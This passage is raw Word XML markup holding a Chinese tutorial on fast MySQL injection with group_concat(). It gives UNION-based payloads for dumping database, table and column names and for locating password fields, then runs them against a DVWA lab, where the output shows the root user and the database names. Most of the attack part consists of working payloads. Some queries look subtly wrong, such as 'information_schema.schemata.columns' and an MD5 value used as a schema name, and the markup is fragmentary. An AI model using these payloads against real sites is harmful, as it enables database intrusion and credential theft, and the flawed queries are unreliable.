        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005060C3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>group_concat()快速实施MySQL注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E272F68" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="004355A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对MySQL 5注入时，可以直接查询“information_schema”库，快速找到所需的表段。同时可以利用group_concat()函数，直接爆出数据库中的内容，不必用LIMIT一个一个猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30528193" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="004355A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利用group_concat()函数注入检测语句如下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841A13E" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00276D91" w:rsidRDefault="00EE318A" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00276D91" w:rsidRPr="00276D91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆所有数据名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3B43F" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="00876B3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group_concat(SCHEMA_NAME) from information_schema.schemata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB69DDE" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="00A34C18"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语句是查询“SCHEMATA”表中的SCHEMA_NAME字段，从而获得所有数据库名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D32456" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00276D91" w:rsidRDefault="00EE318A" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="002B7C50" w:rsidRPr="002B7C50">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆当前库的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325FD83" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="00D01A8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group_concat(table_name) from information_schema.tables where table_schema=database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B779C" w14:textId="77777777" w:rsidR="005436A4" w:rsidRPr="00CD76A0" w:rsidRDefault="005436A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语句是查询“TABLES”表中的TABLE NAME字段，其查询条件为数据库名称字段TABLE_SCHEMA值为当前数据库，从而获得当前数据库中的所有表名.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A88086" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="005436A4"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其实，如果只需找后台密码，可以不必爆所有表名，直接快速定位pass字段在那个表中，提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45578140" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="00E94FE3"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group_concat(table_name) from information_schema.tables where table_schema=database() and COLUMN_NAME like 0x257061737325</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490655BB" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="00FA342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直接爆出包含有pass字段的表名，然后再爆此表的所有列字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313CCD7" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00276D91" w:rsidRDefault="00EE318A" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00FA3420" w:rsidRPr="00FA3420">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆表中的字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A608C7" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="0095606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select group_concat(SCHEMA_NAME) from information_schema.schemata.columns where table_name=表名的十六进制编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABAEBB" w14:textId="77777777" w:rsidR="004355AB" w:rsidRPr="00CD76A0" w:rsidRDefault="0095606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语句是将指定的表名转换为十六进制编码，查询该表名中“COLUMNS”表中存储的与该</w:t>
      </w:r>
      <w:r w:rsidR="008862D6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表名相同的数据库中的所有字段名，从而获得当前数据库指定表中的所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B2043" w14:textId="77777777" w:rsidR="007D362F" w:rsidRDefault="00EE318A" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EE10B5" w:rsidRPr="00EE10B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆指定字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF18C92" w14:textId="77777777" w:rsidR="00842F42" w:rsidRPr="00CD76A0" w:rsidRDefault="00842F4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select group_concat(字段名1,0x7c,字段名2) from 表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA9BE6" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="00CD76A0" w:rsidRDefault="00011D8A"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该语句是通过查询指定表中指定字段名的值，在此查询语句中就不必对字段名和表名进行十六进制编码转换了。其中有一个Ox7c是分隔符“|”的十六进制编码，用于对查询结果中的字段名进行分隔显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B9EBE" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="00276D91" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6175D735" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="00934072" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>高效</w:t>
      </w:r>
      <w:r w:rsidR="00EE6619" w:rsidRPr="00C021F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>mysql攻击测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00EE6619" w:rsidRPr="00C021F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDF396" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRDefault="009229D1" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00C021F1" w:rsidRPr="00C021F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测注入点字段数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7806611C" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRPr="00CD76A0" w:rsidRDefault="00C021F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w:t>
      </w:r>
      <w:r w:rsidR="00B55D15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1=2</w:t>
      </w:r>
      <w:r w:rsidR="00BF780D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidR="00BF780D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="00BF780D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8620A" w14:textId="77777777" w:rsidR="00934072" w:rsidRDefault="00934072" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00934072">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19577CA2" wp14:editId="4C550906">
            <wp:extent cx="5274310" cy="2581296"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2581296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65EA2E" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRPr="009229D1" w:rsidRDefault="009229D1" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009229D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速爆数据库版本、数据库名、链接用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5CAAA" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRPr="00CD76A0" w:rsidRDefault="00C021F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注入点处字段数目为“2"。再一次爆出数据库版本、数据库名和链接用户信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCC16F" w14:textId="77777777" w:rsidR="008051FB" w:rsidRPr="00CD76A0" w:rsidRDefault="008051F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1=2unionselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,group_concat(user(),0x7c7c,version(),0x7c7c,database())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F25ABD2" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRDefault="00C021F1" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233D71BB" w14:textId="77777777" w:rsidR="001800D3" w:rsidRDefault="00BB24A8" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75481187" wp14:editId="68D56CE3">
            <wp:extent cx="5274310" cy="3486150"/>
            <wp:effectExtent l="19050" t="0" r="2540"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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3486150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740CFA1" w14:textId="77777777" w:rsidR="009229D1" w:rsidRPr="008051FB" w:rsidRDefault="009229D1" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6A0BE8" w14:textId="77777777" w:rsidR="00C021F1" w:rsidRPr="00CD76A0" w:rsidRDefault="00C021F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得到数据库版本为5.1.50，数据库名为“dvwa 数据库用户名为root "再提交以下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57BADD" w14:textId="77777777" w:rsidR="00DF6BA7" w:rsidRPr="00CD76A0" w:rsidRDefault="00DF6BA7"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union</w:t>
      </w:r>
      <w:r w:rsidR="00C873CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,group_concat(schema_name) from information_schema.schemata</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8AC98" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="00DF6BA7" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBF429D" wp14:editId="6A6B6E6E">
            <wp:extent cx="5274310" cy="4247380"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4247380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F203E2" w14:textId="77777777" w:rsidR="00C42757" w:rsidRPr="00CD76A0" w:rsidRDefault="00C021F1"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爆出所有数据库名，共有9个数据库:</w:t>
      </w:r>
      <w:r w:rsidR="007E1176" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>information_schema,dedecms,dvwa,e,mambo......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BC592" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="00C42757" w:rsidRDefault="00C42757" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0063711F" w:rsidRPr="00C42757">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆当前库所有表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54277563" w14:textId="77777777" w:rsidR="0063711F" w:rsidRPr="00CD76A0" w:rsidRDefault="0063711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直接提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF40D8" w14:textId="77777777" w:rsidR="0063711F" w:rsidRPr="00CD76A0" w:rsidRDefault="0063711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 1=2 union select 1,group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_name) from information_schema.tables where table_schema=database()+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F744D6" w14:textId="77777777" w:rsidR="0063711F" w:rsidRPr="0063711F" w:rsidRDefault="0063711F" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3678534B" wp14:editId="41203C36">
            <wp:extent cx="5274310" cy="4327426"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4327426"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56187938" w14:textId="77777777" w:rsidR="0063711F" w:rsidRPr="00CD76A0" w:rsidRDefault="00C576AA"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样可一次性爆当前库所有表名，为了保证当前表是否包含管理员员帐号和密码，我们可以通过下列语句进行测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF2B05" w14:textId="77777777" w:rsidR="00C576AA" w:rsidRPr="00CD76A0" w:rsidRDefault="008171A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 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>98DD4E762E039FC0476F8FFF1DC0D1C8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095211D9" w14:textId="77777777" w:rsidR="005F124E" w:rsidRPr="00CD76A0" w:rsidRDefault="008171A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注:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>98DD4E762E039FC0476F8FFF1DC0D1C8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是MD5_32数据库名加密的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8359B2" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="00183DF6" w:rsidRDefault="00183DF6" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="005F124E" w:rsidRPr="00183DF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆当前库表名所有字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614CD6B" w14:textId="77777777" w:rsidR="005F124E" w:rsidRPr="00CD76A0" w:rsidRDefault="005F124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 1=2 union select 1,group_concat(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
